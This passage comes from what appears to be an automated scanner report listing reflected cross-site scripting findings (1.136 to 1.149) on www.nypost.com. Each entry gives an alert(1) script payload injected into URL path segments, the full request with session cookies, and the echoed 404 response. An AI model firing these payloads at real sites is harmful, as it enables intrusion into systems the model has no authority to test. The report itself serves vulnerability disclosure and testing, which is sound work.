Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5f4e3<script>alert(1)</script>4626908c455 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost5f4e3<script>alert(1)</script>4626908c455/hbx/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost5f4e3<script>alert(1)</script>4626908c455/hbx/hbx_original.js</p>
...[SNIP]...

1.136. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8b9b5<script>alert(1)</script>9814304567a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx8b9b5<script>alert(1)</script>9814304567a/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx8b9b5<script>alert(1)</script>9814304567a/hbx_original.js</p>
...[SNIP]...

1.137. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b6083<script>alert(1)</script>b0e9792fce3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.jsb6083<script>alert(1)</script>b0e9792fce3 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/hbx_original.jsb6083<script>alert(1)</script>b0e9792fce3</p>
...[SNIP]...

1.138. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e628<script>alert(1)</script>09a97cae6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig4e628<script>alert(1)</script>09a97cae6a7/WebPortal/nypost/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig4e628<script>alert(1)</script>09a97cae6a7/WebPortal/nypost/hbx/migration.js</p>
...[SNIP]...

1.139. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 49517<script>alert(1)</script>7edb2c58dea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal49517<script>alert(1)</script>7edb2c58dea/nypost/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal49517<script>alert(1)</script>7edb2c58dea/nypost/hbx/migration.js</p>
...[SNIP]...

1.140. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31844<script>alert(1)</script>2dee1e689aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost31844<script>alert(1)</script>2dee1e689aa/hbx/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost31844<script>alert(1)</script>2dee1e689aa/hbx/migration.js</p>
...[SNIP]...

1.141. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84686<script>alert(1)</script>228cd1853ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx84686<script>alert(1)</script>228cd1853ec/migration.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx84686<script>alert(1)</script>228cd1853ec/migration.js</p>
...[SNIP]...

1.142. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/migration.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/migration.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5e4a<script>alert(1)</script>77b6c01c39d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/migration.jsc5e4a<script>alert(1)</script>77b6c01c39d HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/migration.jsc5e4a<script>alert(1)</script>77b6c01c39d</p>
...[SNIP]...

1.143. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aaf57<script>alert(1)</script>d9e1ed63c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigaaf57<script>alert(1)</script>d9e1ed63c86/WebPortal/nypost/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigaaf57<script>alert(1)</script>d9e1ed63c86/WebPortal/nypost/hbx/ntpagetag.js</p>
...[SNIP]...

1.144. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a574<script>alert(1)</script>aaf8695b0eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal1a574<script>alert(1)</script>aaf8695b0eb/nypost/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal1a574<script>alert(1)</script>aaf8695b0eb/nypost/hbx/ntpagetag.js</p>
...[SNIP]...

1.145. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 124c8<script>alert(1)</script>4a6d53f8624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost124c8<script>alert(1)</script>4a6d53f8624/hbx/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost124c8<script>alert(1)</script>4a6d53f8624/hbx/ntpagetag.js</p>
...[SNIP]...

1.146. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ded23<script>alert(1)</script>e53663e38e0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbxded23<script>alert(1)</script>e53663e38e0/ntpagetag.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbxded23<script>alert(1)</script>e53663e38e0/ntpagetag.js</p>
...[SNIP]...

1.147. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 83680<script>alert(1)</script>b26a91359a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js83680<script>alert(1)</script>b26a91359a1 HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js83680<script>alert(1)</script>b26a91359a1</p>
...[SNIP]...

1.148. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b158d<script>alert(1)</script>8eb8422dc3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfigb158d<script>alert(1)</script>8eb8422dc3c/WebPortal/nypost/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/SysConfigb158d<script>alert(1)</script>8eb8422dc3c/WebPortal/nypost/unica/hbx_original.js</p>
...[SNIP]...

1.149. http://www.nypost.com/rw/SysConfig/WebPortal/nypost/unica/hbx_original.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac67d<script>alert(1)</script>f5d5330c430 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw/SysConfig/WebPortalac67d<script>alert(1)</script>f5d5330c430/nypost/unica/hbx_original.js HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
